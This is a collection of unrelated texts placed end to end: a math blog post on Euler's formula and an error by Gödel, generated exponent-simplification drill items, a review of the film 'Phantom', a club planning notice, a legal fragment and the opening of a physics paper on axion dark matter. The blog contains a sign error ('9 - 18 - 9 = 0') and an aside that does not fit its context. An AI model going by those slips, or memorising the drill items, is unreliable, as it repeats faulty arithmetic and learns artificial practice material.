Lakatos' principal example, Euler's theorem about polyhedra: Let F, E, and V be the number of faces, edges, and vertices in a polyhedron. Then F - E + V = 2. For example, the cube has (F, E, V) = (6, 12, 8), and 6 - 12 + 8 = 2. Sometime later, someone observed that Euler's theorem was false for polyhedra with holes in them. For example, consider the object shown at right. It has (F, E, V) = (9, 18, 9), giving F - E + V = 9 - 18 - 9 = 0. Can we say that Euler was wrong? Not really. The question hinges on the definition of "polyhedron". Euler's theorem is proved for "polyhedra", but we can see from the example above that it only holds for "simply-connected polyhedra". If Euler proved his theorem at a time when "polyhedra" was implicitly meant "simply-connected", and the generally-understood definition changed out from under him, we can't hold that against Euler. In fact, the failure of Euler's theorem for the object above suggests that maybe we shouldn't consider it to be a polyhedron, that it is somehow rather different from a polyhedron in at least one important way. So the theorem drives the definition, instead of the other way around. Okay, enough introductory remarks. My first example is unquestionably a genuine error, and from a first-class mathematician. Mathematical background Some terminology first. A "formula" is just that, for example something like this: $$\displaylines{ ((\forall a.\lnot R(a,a)) \wedge\cr (\forall b\forall c.R(b,c)\to\lnot R(c,b))\wedge\cr (\forall d\forall e\forall f.(R(d,e)\wedge R(e,f)\to R(d,f))) \to\cr (\forall x\exists y.R(y,x)) }$$ It may contain a bunch of quantified variables (a, b, c, etc.), relations (like R), and logical connectives like ∧. A formula might also include functions and constants (which I didn't) or equality symbols (there are none here). One can ask whether the formula is true (or, in the jargon, "valid"), which means that it must hold regardless of how one chooses the set S from which the values of the variables will be drawn, and regardless of the meanings assigned to the relation symbols (and to the functions and constants, if there are any). The following formula, although not very interesting, is valid: $$ \forall a\exists b.(P(a)\wedge P(b))\to P(a) $$ This is true regardless of the meaning we ascribe to P, and regardless of the set from which a and b are required to be drawn. The longer formula above, which requires that R be a linear order, and then that the linear order R have no minimal element, is not universally valid, but it is valid for some interpretations of R and some sets S from which a...f, x, and y may be drawn. Specifically, it is true if one takes S to be the set of integers and R(x, y) to mean x < y. Such formulas, which are true for some interpretations but not for all, are called "satisfiable". Obviously, valid formulas are satisfiable, because satisfiable formulas are true under some interpretations, but valid formulas are true under all interpretations. Gödel famously showed that it is an undecidable problem to determine whether a given formula of arithmetic is satisfiable. That is, there is no method which, given any formula, is guaranteed to tell you correctly whether or not there is some interpretation in which the formula is true. But one can limit the form of the allowable formulas to make the problem easier. To take an extreme example, just to illustrate the point, consider the set of formulas of the form: ∃a∃b... ((a=0)∨(a=1))∧((b=0)∨(b=1))∧...∧R(a,b,...) for some number of variables. Since the formula itself requires that a, b, etc. are each either 0 or 1, all one needs to do to decide whether the formula is satisfiable is to try every possible assignment of 0 and 1 to the n variables and see whether R(a,b,...) is true in any of the 2n resulting cases. If so, the formula is satisfiable, if not then not. Kurt Gödel, 1933 One would like to prove decidability for a larger and more general class of formulas than the rather silly one I just described. How big can the class of formulas be and yet be decidable? It turns out that one need only consider formulas where all the quantifiers are at the front, because there is a simple method for moving quantifiers to the front of a formula from anywhere inside. So historically, attention has been focused on formulas in this form. One fascinating result concerns the class of formulas called [∃*∀2∃*, all, (0)]. These are the formulas that begin with ∃a∃b...∃m∀n∀p∃q...∃z, with exactly two ∀ quantifiers, with no intervening ∃s. These formulas may contain arbitrary relations amongst the variables, but no functions or constants, and no equality symbol. [∃*∀2∃*, all, (0)] is decidable: there is a method which takes any formula in this form and decides whether it is satisfiable. But if you allow three ∀ quantifiers (or two with an ∃ in between) then the set of formulas is no longer decidable. Isn't that freaky? The decidability of the class [∃*∀2∃*, all, (0)] was shown by none other than Gödel, in 1933. However, in the last sentence of his paper, Gödel added that the same was true even if the formulas were also permitted to include equality: In conclusion, I would still like to remark that Theorem I can also be proved, by the same method, for formulas that contain the identity sign. Oops This was believed to be true for more than thirty years, and the result was used by other mathematicians to prove other results. But in the mid-1960s, Stål Aanderaa showed that Gödel's proof would not actually work if the formulas contained equality, and in 1983, Warren D. Goldfarb proved that Gödel had been mistaken, and the satisfiability of formulas in the larger class was not decidable. Sources Gödel's original 1933 paper is Zum Entscheidungsproblem des logischen Funktionenkalküls ( On the decision problem for the functional calculus of logic ) which can be found on pages 306–327 of volume I of his Collected Works . (Oxford University Press, 1986.) There is an introductory note by Goldfarb on pages 226–231, of which pages 229–231 address Gödel's error specifically. I originally heard the story from Val Tannen, and then found it recounted on page 188 of The Classical Decision Problem , by Egon Boerger, Erich Grädel, and Yuri Gurevich. But then blog reader Jeffrey Kegler found the Goldfarb note, of which the Boerger-Grädel-Gurevich account appears to be a summary. Thanks very much to everyone who contributed, and especially to M. Kegler. (I remind readers who have temporarily forgotten, that Acta Quandalia is the quarterly journal of the Royal Uzbek Academy of Semi-Integrable Quandle Theory. Professor Snorfus, you will no doubt recall, won the that august institution's prestigious Utkur Prize in 1974.) [ Addendum 20080206: Another article in this series. ] [ Addendum 20200206: A serious mistake by Henri Lebesgue. ]
[Other articles in category /math] permanent link
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"pile_set_name": "OpenWebText2"
} |
Simplify ((((j**(-1)*j)/j*j*j**(2/21))/(j/j**(3/7)*(j**(-12)*j)/j*j))**(-1/74))**47 assuming j is positive.
Simplify ((x**3*x)**(-47))**(2/15)/((x**(-1)*x)**(4/11))**(1/22) assuming x is positive.
Simplify ((((u*(u*u/(u*((((u/(u/u**(1/3))*u*u)/u)/u)/u)/u*u)*u)/u*u)**(-3/8))**42)**(-8))**(24/13) assuming u is positive.
Simplify ((x/x**(-9)*x)/x**5*x**(-14)*x**(-4/11))**(-10/7) assuming x is positive.
Simplify ((c/((c**(-13/4)/c)/c)*(c/((c*(c/(c*c*c**(-11)*c))/c)/c)*c*c*c)/c)/(c**(-15)*c/(c/(c/(c*c**(-2/19)))*c)*c))**(-30) assuming c is positive.
Simplify ((((v*(v/v**(-2/3))/v)/v)**(1/29)*v**12/v*v/(v/(v**10*v)))**(-22))**(-5/13) assuming v is positive.
Simplify ((m*(m*m/m**(-18))/m)/(m*m**(-2/25)/m*m)*(m**(2/3))**0)**(6/7) assuming m is positive.
Simplify (y**(-1)*y)**(-2/37)/(y**(-1)*y**6)*(y/y**(-9)*y**(-7))**(2/15) assuming y is positive.
Simplify (r**(-13)/r**(-8/3))/(r**(-8/15)/(r**(-1/31)*r)) assuming r is positive.
Simplify ((w**(-1/2)*w*w)**(-38))**(6/5)*(((w*w*w**(-2/5)*w)/w*w)/w)**4/((w**(1/2)*w)/w*w**(-7)) assuming w is positive.
Simplify ((s**(-2/11)*s)/s**(-1/4))**(-5/14)/(s**(-3/5)/s*s*((s/s**(2/9))/s)/s)**37 assuming s is positive.
Simplify (z**(-37/2)/(z*z**34*z*z*z*z*z))/((z*z**(-26))/(z/(z/(z/z**43)))) assuming z is positive.
Simplify (z**24)**(-2/15)*(z/z**(3/5)*z)/(z*z/(z/z**(4/3))) assuming z is positive.
Simplify ((i**(6/17)*i*i*i**(-6/5)*i*i)/(i**(-2/13)/i**(-33)))**14 assuming i is positive.
Simplify ((u/(u/(u*(u*u**(-2/5))/u))*(u**(-2/9)*u)/u)/(u**6/u*u*u/(u*(u*u*u/u**(-2/25))/u)*u))/((u**(-4)/u)/u**1)**(-3/11) assuming u is positive.
Simplify ((o**(-1/4))**34*(o*o**4*o*o)/o**8)/(o**(5/3)*o**(-5/3)*((o**2*o)/o)**0) assuming o is positive.
Simplify (d**0/d*d**12/d)**(-14)*(((d/(d**3*d))/d)**18)**39 assuming d is positive.
Simplify (d**(1/14)/d**(1/8)*d**(-11)*d**(-2/17))**(7/5) assuming d is positive.
Simplify ((l**(4/15))**(1/5)/((l/l**(2/17))/l)**39)**(1/48) assuming l is positive.
Simplify ((((k/k**5)**(-10/11))**(-7))**(-17))**(7/5) assuming k is positive.
Simplify ((i/((i**(-2/23)*i*i*i)/i))/i*i**1)**9*(i*i*i**(4/5)*i*i*i*i/i**(-6/11))**(-17) assuming i is positive.
Simplify (d*d**(2/13)*d*d**(-4/7))/((d*d**(-8)/d*d)/(d*d**(-1/3)/d))*((d*d**5*d)/(d*d/(d**(-3)*d)))**(1/10) assuming d is positive.
Simplify ((l**(-1))**(-8/3)*(l*l*l**2)/l**(-4))/((l/(l/l**7)*l/l**2)/(l**(-1)/l)**(2/17)) assuming l is positive.
Simplify ((((p*p**(-4))/p)/p*p*p**(1/2))/(p**(-1/2))**(-42))/(((p*p**(2/17))/p)/p**(-2/3))**(11/4) assuming p is positive.
Simplify (u**0*u/u**1*u**(-2)*u**(-1/5)/u)/((u/(u**(-2/3)/u)*u)**(5/8)*(u**0)**(-3/4)) assuming u is positive.
Simplify (x**11/x*x/(x/(((x*x/x**22)/x)/x))*x**10/x**(10/11))**(-13) assuming x is positive.
Simplify ((n*n**(2/15)/n)**(-4)*(n*n**(-1/5))/(n/(n*n/n**(-2/9))))**4 assuming n is positive.
Simplify (p/(p*p**6)*p**(4/5)*p/p**3*p/(p/(p*p**(1/5))))/((p**(-1))**(-2/15)*(p*p/(p*p**(1/9)*p))/(p*p**1/p)) assuming p is positive.
Simplify ((r/((r*r/(r/(r/(r**(-4/9)/r)*r)))/r))/r**(1/3)*r**(-8)/r**7)/(r*r**(-11)*r*r**0)**(-50) assuming r is positive.
Simplify ((i*((i*i**(-3)*i*i*i*i*i)/i)/i*i)**(5/4)/(i**17*i/i**2))**(-2/11) assuming i is positive.
Simplify (k**(-2/83))**(33/2)/((k**(6/7)/k)/k)**44 assuming k is positive.
Simplify ((d/d**6)/d**(-3)*(d**(-2/3))**(-4))/((d*d**(-2/9))/d*d*(d/d**(-5))/d*(d**(-1)*d)**(7/3)) assuming d is positive.
Simplify ((o*o**1)**(-13)/((o*o**(-2/5))/(o*o**(-7))))/((o/(o*o*o**0*o)*o*o*(o*o**(-4))/o)/(o**(2/3)*o**(-9))) assuming o is positive.
Simplify ((s**(-20)*s/((((s**1*s*s)/s)/s)/s))/(s**(-6))**(-4/25))**(-1/28) assuming s is positive.
Simplify (d**(-2/5))**(-2/121)/(d/(((d*d*d*d**(-7))/d)/d)*d**(-2/9))*(d**(1/7)*d**(3/7))**(7/9) assuming d is positive.
Simplify ((t/((t**(-1/6)/t)/t*t)*t)/t*t*t**(-3/2)*t)**(10/9)/(((t*t**(-1/6)/t)/t**(-3))/(t**(-3/4)*t**(-1/4))) assuming t is positive.
Simplify ((g**(-1/2))**(-28/3)/((g*g*g**(2/9))/((g**6*g)/g*g)))/(g/g**(-1/2)*g*g**(2/7)*g*(g**0)**44) assuming g is positive.
Simplify ((h/(h/(h/(h**0*h))))**44)**(25/7)*(h*h**(-2/7)*h)**8*(h**(1/2)/h)**(-46) assuming h is positive.
Simplify ((g*g**(-8/5)*g*g**(-3))/(g**(-7)/(g**(1/15)*g)))/(((g*g**(-2/3))/g)**(1/5))**35 assuming g is positive.
Simplify (((s*s/(s/(s**4*s)*s))**(-1/72)*(s*s*s/(s*s/((s*s/(s**14*s))/s)))/s*((s**(-4)/s)/s)/s)**(5/3))**(-5/8) assuming s is positive.
Simplify (((y*y*(y/(y/y**7)*y)/y)/y*(y*y/(y*y/y**4)*y*y)/y)/(y/(y*y**0)*y/(y*y*y*y*(y**(3/7)/y)/y)*y))/((y**(2/5)/y)**(-1/15))**23 assuming y is positive.
Simplify ((o**(-6)*o/(o/(o/(o/o**6*o))))/(o**(2/5)/o*o/(o*o**(-12/13))))**(-22) assuming o is positive.
Simplify y**18*(y*y*y**(-12)*y*y)/y*(y**22/y)/y**(-2) assuming y is positive.
Simplify (((n/n**(-1/4))**(1/31)*n**(-1/7)/(n/(n*((((n/n**(-1/8))/n*n)/n)/n*n)/n)))**(1/26))**(5/9) assuming n is positive.
Simplify (((n**(-6)/n)/n)/(n*(n*n**4)/n*n))**(1/46)*n/(n**(-3/2)/n)*n*n*n**0*(n**(2/9))**(2/163) assuming n is positive.
Simplify ((q**(-5)/(q**(1/5)/q*q*q))/(q**(-1)/q)**35)/((q**(1/3)/q*q*q/q**(-4))/((q*(q*q*q**(-2/5))/q)/q*q)**(3/11)) assuming q is positive.
Simplify (v*v*(v*v/v**(-2/9)*v)/v*v*v**(3/2)*(v**(2/5)/v)**(-13))**(-2/59) assuming v is positive.
Simplify (x**(-3/8)*x**(2/3))**(-7)/((((x**(-1)/x)/x)/x*x*x)/(x*x*x**(-2/11))*(x/(x**0*x*x))**(2/75)) assuming x is positive.
Simplify f**(-2/3)*f*f**(-20)*f**(19/5)*f*f*f**(-1)*f assuming f is positive.
Simplify ((m*m**(-6))/(m/(m**(5/4)*m)))/(m/m**1)**(-2/51)*((m**(-1))**3)**(-3/11) assuming m is positive.
Simplify (b**(3/5)/b**2)**(-1)*b/(b**(2/15)/b*b)*(b/(b/b**(2/7)*b*b))/b*b*(b/(b/(b**(2/7)*b)))**40 assuming b is positive.
Simplify ((x*x*(x*x*x**1)/x*x)/(x**(2/9)*x*x))**(-3/5)*((x/x**(1/4))/x**(-4))**(-39) assuming x is positive.
Simplify ((m/(m/m**(-2/17)))**34*m**25/(m*m*m**(-1/29)))**(-1/10) assuming m is positive.
Simplify k*k*k**6*k*k**5*k*(k/(k/k**(-1)))**(-1/25)*((k**(-2/17)*k)/((k/(k**0/k))/k*k))**44 assuming k is positive.
Simplify ((z**1*z)**(1/4))**(1/5)/((z/z**1)**(-2/13)*z**(-6/11)*(z*z**(1/2))/z) assuming z is positive.
Simplify ((v/(v/v**(-9)))/(v/(v/((v/v**(1/6)*v)/v))))**8/(v/(v/v**5)*v*(v*v*v**(-6)*v)/v*(v*v**(-2/19))/(v**(-1)/v)) assuming v is positive.
Simplify (i**3/(i*i**(-1)/i)*((i/i**(-5))/i*i)**(-39))**21 assuming i is positive.
Simplify (v**18/v)**(4/3)/(v**(5/4))**(-35) assuming v is positive.
Simplify ((k**(-2/3))**(-43))**(-6/5)/((k**1*k/k**4)/(k**(-2/7))**10) assuming k is positive.
Simplify (((x*(x*x**(5/2))/x*x*x**(1/7))/(x**(-7)/((x/(x/(x/(x/x**(-3/11)*x)))*x)/x)))**(3/28))**(-13) assuming x is positive.
Simplify (k**(-1/7)/k**(-2/9))/((k/(k*k/(k*k*k*k**7*k)))/(k**(-3/4)/k))*((k*((k/k**2)/k)/k)/k**4)/(k*k**(-3/8)*k*k/k**(-5/4)) assuming k is positive.
Simplify (((b**(2/7))**(-30)/(b/(b*(b*b**7)/b)*b*b/(b*b**(-4/5))))**(2/7))**(14/9) assuming b is positive.
Simplify w**(1/6)/w**2*(w/w**(3/8)*w)/(w*w**(-6))*((((((w**(-1/3)/w*w)/w)/w)/w)/w)**(-14))**(-18) assuming w is positive.
Simplify ((l**(-1))**18)**(19/4)/((l/l**2)**(5/6)/(l**(5/3)/l**(1/5))) assuming l is positive.
Simplify (j**(-7)*j**0*j**(-6)/(j**(-6)/j))**(3/41) assuming j is positive.
Simplify (z**7*z*z**(-13))**(-17/4)*(z/(z/(z*(z*z**2)/z))*z)**(-18)*z*z**(-4/7)/z*z*z*z*z**(-3/8) assuming z is positive.
Simplify ((s**1)**2)**(2/31)*(s/(s/s**(-1)))**(-33)/(s**(-1/4)*s**(-3/7)) assuming s is | {
"pile_set_name": "DM Mathematics"
} |
If you've come from our parental review of this film and wish to return to it, simply click on your browser's BACK button.
Otherwise, use the following link to read our complete Parental Review of this film.
Action/Thriller: A Cold War Soviet missile submarine captain is sent on a sudden, classified mission where he must contend with rogue KGB agents who may be intent on starting WWIII.
It's 1968 and Demi (ED HARRIS) is a Soviet missile submarine captain who's forever operated in the shadow of his legendary Naval father and never lived up to the accompanying expectations. Having just returned from a mission, he isn't pleased to learn that he's immediately being sent out again. To make matters worse, he's being given command of an old, diesel-powered sub with which he has an uncomfortable past. Nevertheless, and being one who follows orders, he sets sail with his crew that includes Alex (WILLIAM FICHTNER), his executive officer who's in line to replace his mentor; Pavlov (JOHNATHON SCHAECH), the ship's political officer; and two new members. They're Bruni (DAVID DUCHOVNY) and Garin (DEREK MAGYAR), two KBG agents who come onboard to conduct secret equipment testing on a classified mission.
Demi isn't comfortable with that or the way in which Bruni orders him and his crew around. His sense of following protocol along with a medical condition stemming from his past on the sub, however, means he begrudgingly accepts Bruni's commands. But when it appears there's more to the KBG agents' testing, Demi and his followers must do what they can to keep the rest of the Soviet fleet from attacking them while also preventing Bruni from starting WWIII.
OUR TAKE: 5 out of 10
I've long been fascinated by people who can do perfect vocal impressions of others. While I can hear celebrities' voices in my head, I can guarantee there's zero probability I can audibly replicate them. I'm marginally better at doing a handful of foreign accents while still speaking English, although I doubt I sound authentic to those who hail from such places.
That said (pun fully intended), I did manage -- for a few days until I tired of the ruse -- to fool a number of American classmates at the beginning of my freshman year in college that I was from the town of Richmond in England rather than the city in Virginia. I'm sure it never rose above the status of caricature, something that often bedevils American actors when they try to play other nationalities (unlike many Brits, Aussies and others who convincingly manage to sound American).
All of which brings us around to the military period thriller, "Phantom." Based on a true story I'd never previously known about, it's the fictionalized account of Soviet submarine K-129 that sank on March 8, 1968 after apparently nearly starting WWIII (a text quote at the beginning states the event was even more dangerous than the Cuban Missile Crisis years earlier).
Various theories abound as to what happened to the sub, but Kenneth Sewell (in his book "Red Star Rogue-The Untold Story of a Soviet Submarine's Nuclear Strike Attempt on the U.S.") proposed that an unauthorized launch was intended to mimic an attack by a Chinese sub, thus resulting in a war between them and the U.S. It's fascinating stuff and clearly could make a terrific movie.
Alas, those pesky Russian accents -- or, more accurately, the lack thereof -- near immediately put this flick into a dive from which it constantly battles to make it back to the surface and thus soar to great heights. And then there's the fact that many other (and often far better) submarine movies have sailed the cinematic seas, including but not limited to "Gray Lady Down," "Das Boot," "U-571," "K-19: The Widowmaker" and "The Hunt for Red October."
It's that latter filmed adaptation of Tom Clancy's thriller that will draw most comparisons to this film. After all, there's a device on both Soviet subs that scrambles their sonar profile to throw off the enemy, the fact that those who control the subs are either trying to defect or start WWIII, and thus both the U.S. and Soviet forces separately want to put an end to that. There's even the Russian accent issue, although "Red October" deftly and convincingly handled that with a cool, in-scene dialogue transition.
No such attempt is made here, with writer/director Todd Robinson simply staying the course and hoping audiences don't mind. I'd also say notice, but that's impossible, especially when the very American (and American sounding) David Duchovny boards the sub as a KGB agent carrying out secretive plans. That doesn't sit well with the captain (Ed Harris) or his second-in-command (William Fichtner) and thus begins the tale of Soviet character who never feel that Russian.
To be fair, and despite the lack of novelty in terms of how such submarine films often play out, the filmmaker does manage to raise tension and suspense to decent levels at times during the film's nearly 100 minute runtime. But he's also thrown in a back-story regarding the captain's past experience with the sub (and his resultant issues) that feels shoehorned into the story, along with a twist at the end that's supposed to be poignant but isn't handled properly to make it work or pay off as intended.
In addition, and for better or worse, nearly all of the undersea action takes place inside the old, diesel-powered sub, with only a few underwater shots of other submarines and the torpedoes they fire at the old clunker. That may have been done in hopes of ratcheting up the claustrophobic suspense in our one setting or it could have been a way of keeping production costs down (by avoiding the need to build the interior of another sub) as this film was made outside of the big budget Hollywood system.
Whatever the case, it results in our protagonist-antagonist battle taking place inside the small sub. That tactic works for a bit, but contains its own limitations that ultimately rob the film of some of its potential. After all, imagine if "Star Trek II: The Wrath of Khan" (arguably the best "submarine in space" movie ever made) took place only inside the U.S.S. Enterprise and didn't involve the Reliant at all. It simply wouldn't have been the same movie.
As it stands, "Phantom" (so named for the new cloaking type device on the sub that strangely isn't utilized later in the film) is an okay military thriller. But considering the real-life story behind the tale, it could and should have been so much more. Especially if the Russian accents had been nailed. It rates as a 5 out of 10.
Reviewed February 25, 2013 / Posted March 1, 2013
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Circuitousover on the Dustloop Forums has done something incredible. He's managed to rip all of the sprites for every single character in Persona 4 Arena. These are probably the most awesome sprites to ever grace a fighting game. | {
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From the hundreds of pieces of feedback we have received, 8 core areas of interest have arisen:
1. Games Development
2. Club Inclusion and Community
3. Facilities
4. Club Structures & Reporting
5. Communications & Marketing
6. Finances & Funding
7. Commercial
8. Health & Wellbeing
There is already great work been completed in these areas, we are looking to build on this work, add in new exciting initiatives and pull it all together into one cohesive plan for the club.
We are holding an update meeting on the 3rd of March @8pm where we will go into more details on the process so far and the formation and remit of each working group. We want people to come along on the night, hear about the amazing research results we have and if you are interested, to get involved with one of these key working groups that will drive the future development of our club.
Looking forward to seeing you on the night, make sure to bring a few people along with you, no GAA background needed to become involved
Background info on the Black + Amber plan
There are many positive challenges and some exciting opportunities facing Naomh Mearnog GAA in the years ahead. As a club we need to plan for these challenges and opportunities. The Black & Amber Plan, is a club wide collaborative initiative for every club member will have multiple opportunities to “Have Your Say!!!” on how as a club we should face the future together.
The overriding purpose of the plan is to set out a vision where we want to be as a Club in 5 years’ time and outline the necessary steps how we get there.
Contact us
You can email us your feedback at [email protected]
We are holding an update meeting on the 3rd of March @8pm, please come along to find out what has been going on and the next steps in the process. | {
"pile_set_name": "Pile-CC"
} |
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TransCanada said that it had previously pointed out that PSNH’s construction of the variance provision would lead to the absurd result that PSNH could have spent an unlimited amount of money on the Scrubber and never had the duty to seek a variance from the law. | {
"pile_set_name": "Pile-CC"
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abstract: 'We propose new signals for the direct detection of ultralight dark matter such as the axion. Axion or axion like particle (ALP) dark matter may be thought of as a background, classical field. We consider couplings for this field which give rise to observable effects including a nuclear electric dipole moment, and axial nucleon and electron moments. These moments oscillate rapidly with frequencies accessible in the laboratory, $\sim$ kHz to GHz, given by the dark matter mass. Thus, in contrast to WIMP detection, instead of searching for the hard scattering of a single dark matter particle, we are searching for the coherent effects of the entire classical dark matter field. We calculate current bounds on such time varying moments and consider a technique utilizing NMR methods to search for the induced spin precession. The parameter space probed by these techniques is well beyond current astrophysical limits and significantly extends laboratory probes. Spin precession is one way to search for these ultralight particles, but there may well be many new types of experiments that can search for dark matter using such time-varying moments.'
- 'Peter W. Graham'
- Surjeet Rajendran
title: New Observables for Direct Detection of Axion Dark Matter
The existence of dark matter is concrete evidence for physics beyond the standard model. It is reasonable to expect the dark matter to interact non-gravitationally with the standard model. The identification of such interactions may allow new probes of the Universe and unveil new structures in particle physics. The generic expectation of the existence of new physics at the weak scale lead to the Weakly Interacting Massive Particle (WIMP) hypothesis - the dark matter is a weak scale particle that interacts with the standard model with weak scale cross-sections. A variety of experimental approaches have been developed to test the WIMP hypothesis. These include techniques to observe the direct scattering of WIMP particles with nuclei [@Goodman:1984dc] and electrons [@Graham:2012su; @Essig:2011nj], the detection of cosmic rays produced from the annihilation [@Rudaz:1987ry; @Galli:2009zc; @Slatyer:2009yq] or decay [@Arvanitaki:2008hq; @Arvanitaki:2009yb] of dark matter particles as well as searches in colliders for weakly interacting particles [@Sigurdson:2004zp; @Rajaraman:2011wf; @Bai:2010hh]. These techniques have been deployed in a variety of dedicated experiments that have placed significant constraints on the parameter space of viable WIMP dark matter [@Ahmed:2011gh; @:2013doa; @Meade:2009iu; @Essig:2012yx]. Further, direct probes at the Large Hadron Collider (LHC) of frameworks such as supersymmetry that have provided the theoretical support for WIMP dark matter have placed stringent constraints on such models [@Lowette:2012uh]. In fact, these stringent constraints arise from the assumption that the new physics at the LHC always produces a metastable WIMP particle. Indeed, the bounds on these frameworks are significantly alleviated by allowing for such WIMP particles to decay rapidly within the collider [@Graham:2012th], precluding a cosmological role for them.
Given our ignorance of the ultra-violet framework of particle physics and the nature of dark matter, it is important to develop techniques to search for a wide variety of interactions that could be carried by the dark matter. Ultra-light scalars such as axions ($a$) and axion-like-particles (ALPs) with masses $m_a$ significantly smaller than the weak scale are a well motivated class of dark matter candidates. These particles emerge naturally as the Goldstone bosons of global symmetries that are broken at some high scale $f_a$ [@Peccei:1977hh; @Peccei:1977ur; @Weinberg:1977ma; @Wilczek:1977pj; @Kim:1979if; @Shifman:1979if; @Dine:1981rt; @Zhitnitsky:1980he; @Khlopov:1999rs] (see section \[Sec:Overview\] for an overview of such particles). Their Goldstone nature is manifest in their derivative interactions with the standard model:
\frac{a}{f_a} F_{\mu \nu} \tilde{F}^{\mu \nu}, \, \frac{a}{f_a} G_{\mu \nu} \tilde{G}^{\mu \nu}, \frac{\partial_{\mu} a}{f_a} \bar{\Psi}_{f} \gamma^{\mu} \gamma_5 \Psi_{f}.$$
Here, $F_{\mu \nu}$ and $G_{\mu \nu}$ represent the field strengths of electromagnetism and QCD respectively and $\Psi_f$ denotes a standard model fermion. The first of these interactions couples axions (and ALPs) to photons and is used in a variety of experiments to search for the axion. These include methods to search for the conversion of dark matter axions into photons in the presence of a background magnetic field [@Sikivie:1985yu; @Asztalos:2009yp], the detection of axions produced in the Sun [@Irastorza:2006gs] and axion-aided transport of photons through optical barriers [@Ehret:2009sq]. These experiments can search for axions with $f_a \lessapprox 10^{12}$ GeV, with limited ability to go above this scale.
In this paper, we argue that the other operators in can also be used to search for axion (and ALP) dark matter. These operators are particularly useful in probing dark matter axion parameter space where $f_a \gtrapprox 10^{14}$ GeV. An ultra-light particle like the axion ($m_a \ll $ meV) can be a significant fraction of the dark matter only if it has a large number density, leading to large field occupation numbers. Consequently, axion dark matter can be viewed as a background classical field oscillating at a frequency equal to its mass [@Dine:1982ah; @Preskill:1982cy]. Conventional axion experiments search for energy deposition from this background classical field. But, a background classical field can also lead to additional physical effects such as giving rise to phase differences in local experiments. For example, gravitational wave experiments [@Abbott:2007kv; @Accadia:2012zz; @Dimopoulos:2007cj; @Dimopoulos:2008sv; @Hogan:2010fz; @Graham:2012sy] aim to detect gravitational waves through the phase differences created by the wave instead of the unobservably small rate with which a single graviton would scatter and deposit energy in a detector. Similarly, we show that the classical axion (and ALP) dark matter field through its interaction with the operators in , leads to energy (and phase) differences in atomic systems. These phase differences manifest themselves as time varying moments that can be used to search for such dark matter. Essentially, axion dark matter can be thought of as an oscillating value of the Strong CP angle $\theta_\text{QCD}$, which can lead to new ways to detect it.
For example, it was pointed out in [@Graham:2011qk] that the second operator in gives rise to a time varying nuclear electric dipole moment. These moments oscillate at a frequency equal to the mass of the axion, which can span the frequency space kHz-GHz. Even though the axion arises from ultra-high energy physics, its mass is small enough to be accessible in the laboratory. These frequencies though are rapid enough that conventional laboratory searches for such moments (such as a nuclear electric dipole moment) would have a reduced sensitivity to them since such experiments (for example, [@Romalis:2001qb]) gain sensitivity through long ($\gtrapprox 1$ s) interrogation times. Further, conventional searches for time dependent moments have focussed on time variations occurring over the Hubble scale [@Hubble]. These time variations require the existence of scalar fields with masses comparable to the Hubble scale and such supremely light masses are difficult to obtain without fine-tuning [@Dvali:2001dd]. In contrast, time variations in the frequency range kHz - GHz emerge naturally in many axion (and ALP) models (see section \[Sec:Overview\]).
In this paper, we will show that the time varying moments induced by the dark matter axion (and ALP) can couple to nuclear or electronic spin leading to a precession of the spin. While there may be other experimental strategies to measure these time varying moments, we highlight the technique described in [@NMR; @paper]. In this technique, the induced spin precession changes the magnetization of a sample of material, which can be observed with precision magnetometry. The signal in such an experiment benefits from the large number of spins that can be obtained in a condensed matter system and the availability of high precision SQUID and SERF magnetometers. The time varying nature of the signal can be used to devise resonant schemes that can significantly boost their detectability. Further, since this time variation occurs at a frequency set by fundamental physics, it can also be helpful in combatting systematic noise sources that are encountered in searching for a time independent moment.
We begin by briefly reviewing the physics of the axion in section \[Sec:Overview\]. In this section, we discuss the theoretical origins of axions and ALPs, their parameter space, the current constraints on this parameter space and the region where they can be dark matter. We also review the salient features of axion (and ALP) dark matter. Following this review, we discuss current bounds on such moments and estimate the reach of the precision magnetometry experiments discussed above to probe this parameter space.
Axions and Axion-like-Particles (ALPs) {#Sec:Overview}
Axions and ALPs are generically expected in many models of physics beyond the standard model [@Svrcek:2006yi]. They are the Goldstone bosons of global symmetries that are broken at some scale $f_a$. The Goldstone nature of their origin is manifest in the fact that all their interactions are suppressed by the scale $f_a$ and they are coupled derivatively in these interactions (for example, the operators in ). If they were pure Goldstone bosons, they would be completely massless and would not be the dark matter. However, their pure Goldstone nature could be broken leading to a generation of a mass for them.
This mass generation can occur if the associated global symmetry is anomalous. For example, when this global symmetry has an anomaly with QCD, non-perturbative dynamics at the QCD scale can generate a mass $m_a \sim \frac{\Lambda_{\text{QCD}}^2}{f_a}$ or more precisely $$\label{eqn: axion mass}
m_a \approx 6 \times 10^{-10} \text{ eV} \, \left(\frac{10^{16} \text{ GeV}}{f_a}\right)$$ for the Goldstone boson with about a 10% uncertainty due to QCD [@Cadamuro:2010cz]. This Goldstone boson is called the axion. While it was initially introduced to dynamically solve the strong CP problem [@Peccei:1977hh; @Peccei:1977ur], the underlying mechanism responsible for its dynamics is very general. For example, if the associated symmetry had a mixed anomaly with some other gauge group that also had strong dynamics, that Goldstone boson would also acquire a mass $\sim \frac{\Lambda_s^2}{f_a}$, where $\Lambda_s$ is the scale where the new gauge group becomes strong. A small breaking of the global symmetry is another source of mass. One source of such a small breaking could be quantum gravity which is generically expected to violate global symmetries. In this case, the Goldstone bosons would acquire a mass proportional to the breaking of this global symmetry, leading to a tiny mass for them. Goldstone bosons that do not acquire a mass from QCD are called axion-like-particles (ALPs). Thus, while the mass of the axion depends upon only one free parameter $f_a$, the mass of ALPs depends upon additional parameters.
In this paper, we will be interested in ALPs whose masses are comparable to that of the axion ($\sim$ kHz - GHz). The experimental limits and signatures discussed will apply to both axions and ALPs and henceforth we will refer to them both as ALPs. There are several astrophysical bounds on the ALP operators in and they rule out ALPs with $f_a \lessapprox 10^{9}$ GeV [@Raffelt:2006cw]. Theoretical prejudice suggests that $f_a$ should lie around the fundamental scales of particle physics such as the grand-unified ($\sim 10^{16}$ GeV) or the Planck ($\sim 10^{19}$ GeV) scales, where we expect other symmetries of nature to be broken [@Svrcek:2006yi]. A weak upper bound of $f_a \lessapprox 10^{12}$ GeV can also be placed on the axion based upon its cosmological abundance [@Dine:1982ah; @Preskill:1982cy]. This bound is specific to the QCD axion and arises by assuming that the axion field is displaced $\mathcal{O}\left(1\right)$ from its minimum in the early Universe. This bound can be relaxed, allowing for larger values of $f_a$, if the field displacement was not as large. In fact, the maximum field displacement scales $ \propto \frac{1}{\sqrt{f_a}}$ implying that $f_a \approxeq 